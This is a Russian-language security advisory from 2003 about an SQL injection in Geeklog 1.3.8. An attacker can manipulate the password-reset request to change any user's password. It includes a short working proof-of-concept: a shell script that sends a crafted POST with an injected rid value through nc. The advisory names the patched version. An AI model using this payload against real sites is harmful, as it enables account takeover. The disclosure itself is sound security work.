Security Lab

Sql инъекция в Geeklog

Дата публикации:21.10.2003
Всего просмотров:1203
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Geeklog 1.3.8

Описание: Уязвимость обнаружена в Geeklog. Злонамеренный пользователь может манипулировать SQL запросами.

Злонамеренный пользователь может манипулировать параметром "reqid" при обновлении пароля, чтобы изменить пароль произвольного пользователя.

Пример/Эксплоит:

#!/bin/sh

echo "POST /path/to/gl/users.php HTTP/1.0
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc localhost 80

URL производителя:http://www.geeklog.net

Решение: Обновите программу до 1.3.8-1sr2: http://www.geeklog.net/filemgmt/visit.php?lid=254

Ссылки: Geeklog